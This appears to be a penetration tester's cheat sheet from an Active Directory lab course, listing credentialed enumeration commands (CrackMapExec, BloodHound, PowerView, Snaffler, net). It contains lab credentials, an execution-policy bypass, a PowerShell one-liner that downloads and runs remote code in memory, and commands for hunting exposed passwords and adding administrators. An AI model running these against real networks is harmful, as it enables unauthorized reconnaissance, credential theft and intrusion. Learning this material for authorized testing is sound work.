# Credentialed Enumeration ## Credentialed Enumeration - Linux ### CrackMapExec #### Domain User Enumeration ```bash sudo crackmapexec smb -u forend -p Klmcargo2 --users ``` #### Domain Groups Enumeration ```bash sudo crackmapexec smb -u forend -p Klmcargo2 --groups ``` #### Domain Logged On Users ```bash sudo crackmapexec smb -u forend -p Klmcargo2 --loggedon-users ``` #### Domain Share Searching ```bash sudo crackmapexec smb -u forend -p Klmcargo2 --shares sudo crackmapexec smb -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares' ``` ### SMBMap #### List Shares ```bash smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H ``` #### Recursive List Shares ```bash smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H -R '' --dir-only ``` ### RPCclient #### UserEnum by RID ```bash HTB_@cademy_stdnt! ``` ### WindapSearch #### Search Domain Admins ```bash python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da ``` #### Search Privileged Users ```bash python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU ``` ### BloodHound-py #### Enumerating Everything ```bash sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all ``` ## Credentialed Enumeration - Windows ### Active Directory PowerShell Module ```powershell # Import Module Import-Module ActiveDirectory ``` #### Domain Info ```powershell Get-ADDomain ``` #### Users Info ```powershell Get-ADUser ``` #### Trust Relations ```powershell Get-ADTrust -Filter * ``` #### Group Info ```powershell Get-ADGroup -Filter * | select name ``` #### Detailed Group Info ```powershell GetADGroup -Identity ``` #### Group Memebership ```powershell Get-ADGroupMember -Identity ``` ### PowerView #### Domain Information ```powershell Get-Domain ``` #### Show Domain Controller ```powershell Get-DomainController ``` #### Show all Users ```powershell Get-DomainUser ``` #### Show All Computers ``` Get-DomainComputer ``` #### Show all Groups ```powershell Get-DomainGroup ``` #### Showe specific OU objects in AD ```powershell Get-DomainOU ``` #### Show Specific ACL's ```powershell Find-InterestingDomainAcl ``` #### Show members of a specific domain group ```powershell Get-DomainGroupMember ``` #### Show all GPO ```powershell Get-DomainGPO ``` #### Show User GPO Rights ```powershell # Change this to the user $sid=Convert-NameToSid "Domain Users" # Check Rights Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid} ``` #### Show Domain Policy ```powershell Get-DomainPolicy ``` #### Show Local Groups ```powershell Get-NetLocalGroup ``` #### Show members of a specific local group ```powershell Get-NetLocalGroupMember ``` #### Show Domain Shares ```powershell Find-InterestingDomainShareFile ``` #### Show machines on the local domain ```powershell Find-LocalAdminAccess ``` #### Show Domain Trust ```powershell Get-DomainTrust ``` #### Show all forest trusts for the current forest or a specified forest ```powershell Get-ForestTrust ``` #### Show Trusts in all ```powershell Get-DomainTrustMapping ``` #### Find Password In Users Description ```powershell Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null} ``` #### Find Passwd\_NOTREQ ```powershell Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol ``` #### DONT\_REQ\_PREAUTH ```powershell Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl ``` #### Snaffler Help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories. ```powershell Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data ``` ### Credentialed Enumeration With Built-In Tools #### Basic Enumeration Commands ```powershell # Prints the PC's Name hostname # Prints out the OS version and revision level [System.Environment]::OSVersion.Version # Prints the patches and hotfixes applied to the host wmic qfe get Caption,Description,HotFixID,InstalledOn ``` #### PowerShell Enumeration Commands ```powershell # Lists available modules loaded for use. Get-Module # Will print the execution policy settings for each scope on a host. Get-ExecutionPolicy -List # This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host. Set-ExecutionPolicy Bypass -Scope Process # Return environment values such as key paths, users, computer information, etc. Get-ChildItem Env: | ft Key,Value # This is a quick and easy way to download a file from the web using PowerShell and call it from memory. powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); " # Status Firewall netsh advfirewall show allprofiles # Status Windows Defender Get-MpComputerStatus ``` #### Net Commands ```bash # Information about password requirements net accounts # Password and lockout policy net accounts /domain # Information about domain groups net group /domain # List users with domain admin privileges net group "Domain Admins" /domain # List of PCs connected to the domain net group "domain computers" /domain # List PC accounts of domains controllers net group "Domain Controllers" /domain # User that belongs to the group net group /domain # List of domain groups net groups /domain # Lst users that belong to the administrators group inside the domain (the group Domain Admins is included here by default) net localgroup administrators /domain # Add user to administrators net localgroup administrators [username] /add # Check current shares net share # Get information about a user within the domain net user /domain # List all users of the domain net user /domain # Get a list of computers net view ```